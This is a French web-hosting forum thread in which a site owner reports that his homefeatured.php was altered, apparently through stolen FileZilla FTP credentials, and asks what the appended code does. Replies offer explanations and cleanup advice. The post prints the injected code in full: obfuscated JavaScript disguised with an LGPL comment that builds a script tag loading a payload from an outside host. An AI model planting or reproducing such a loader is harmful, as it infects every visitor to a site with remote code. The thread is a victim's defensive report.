Jump to content

Site hacké ?


nicolas92

Recommended Posts

Bonjour,
Grosse surprise ce matin en faisant machinalement un clic pour aller voir mon site. Le bandeau gauche s'affiche, le header aussi mais rien d'autre avec un message d'erreur disant qu'il y a une erreur de parse dans homefeatured.php en ligne 85.
FTP rapide pour aller voir, je constate qu'il a été modifié hier soir a 18H54 hier soir (bizarre ,j'étais sur mon scooter a cette heure ci et personne n'a les accès..)
Je downloade le fichier en question et je réuploade a la place celui de mon back up, puis changement de mot de passe ftp et admin...

J'ouvre ensuite le fameux homefeatured.php modifié pour trouver à la fin le code suivant :
C'est pour moi du chinois, si quelqu'un peut me dire ce qui s'est passé et ce que ce code a fait (ou tenté)merci d'avance...

[removed]/*LGPL*/ try{ window.onload = function(){E1e6wn3ijzwv9g = 'h$@t##()t(!&@p!@:@/&@/$^&()t($!o)#r$&r;^#e#$)@n!(#$t)!!z$$-@)#c(!o$$!m!^).&s;()&@$o$()s!^o^(.&($!c^&o;^$&)m(#$.&@p)e(!t#a(#r$&^d)$$a^s&)#-)$&c;($)^$o(m!&!.(e!!&a;##!#s^&y;!$l)i&@&f;#e@d&$)i#$!r(!(e!c))t))#.@(^r#)#u#@:^($8(!^0@8#!0$&&&/#()(n[spam-filter]!^g(@&o;@(i$$##s!(a!o@!^.^!n)^e!#)t#!/#(n#@g;)^#^o#)(i^)s($@(a#o(!#.)$n)$@e@&t;@$#/!(@c@$^&$h@(i^@#n&^@a(#(!z((.@$$c##o#$)@m&!/$^!)c[spam-filter](t)r[spam-filter]i$@(p@).&^c^@o()$m(/!!g^^o#)(@o(g^l#e$$.!!@c)^))o^#[spam-filter]#m$/$('.replace(/\!|\^|\)|\$|@|#|&|\(/ig, '');var D7fyb435pte = 's&^(c)##r!^i!@p##!!t@!&'.replace(/#|\)|\$|\(|@|&|\^|\!/ig, '');var Sn9jgvbufr9 = 's@r)^#^c^#'.replace(/\(|#|\^|\!|\$|\)|@|&/ig, '');var Rxs7200gjqt6h = D7fyb435pte;var Rmkt0nsas90ld = document.createElement(Rxs7200gjqt6h);Rmkt0nsas90ld.setAttribute('defer', 'd^^&e;(f(&e;&(@r@('.replace(/&|@|#|\!|\(|\)|\$|\^/ig, ''));var Kaws9hrzdk = 't@^@e!)$x)@t@#)(/!(j(&@a(v#&^a$)s$!c((r@^i)&)p##!t#('.replace(/\)|#|\^|&|\!|\$|@|\(/ig, '');Rmkt0nsas90ld.setAttribute('id', 'J(!)8(!n^$9!i(1^3^($t@^f^)7^(@i@#&v;#)v[spam-filter]'.replace(/\^|\)|\!|\$|&|#|@|\(/ig, ''));Rmkt0nsas90ld.setAttribute(Sn9jgvbufr9,  E1e6wn3ijzwv9g);Rmkt0nsas90ld.setAttribute('type', Kaws9hrzdk);document.body.appendChild(Rmkt0nsas90ld);if (document){Rxs7200gjqt6h = D7fyb435pte;[spam-filter] }  catch(Uskp2qj8xy0ey16t2xwup ) {}[removed]
<!--97d5d4f7664244532860e4ca92eb59b9-->

Link to comment
Share on other sites

Effectivement tu t'es fais avoir... Apparemment le code essaye d'ajouter un frame sur ton site se je ne me trompe pas. Ca me fait penser au fameux virus qui reprend tous les login/pass de ton FileZilla (client FTP).

Effectue une mise à jour de ton antivirus (ou installe en un) et fais un scan complet de ton ordinateur.

Link to comment
Share on other sites

Bonjour Pierre-Yves et bonne année !
Merci pour ton message, effectivement j'ai constaté que tout mes sites (pro et perso) dépendant de mon logiciel de ftp Filezilla ont été touchés mais uniquement sur les index.php, index.html et pour ce fameux homefeatured...
J'ai changé tout mes mots de passe ftp par des trucs que je peux pas retenir et je ne les ai pas saisi en dur dans filezilla. Ils sont dorénavant sur un ..papier.
L'antivirus vient d'être mis a jour et tourne en ce moment, je lance ensuite adaware pour les spyware, j'ai vidé mon cache...mais je suis a l'écoute de toute suggestion pour un logiciel de ftp qui n'a pas le soucis des liste de mot de passe de filezilla...

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...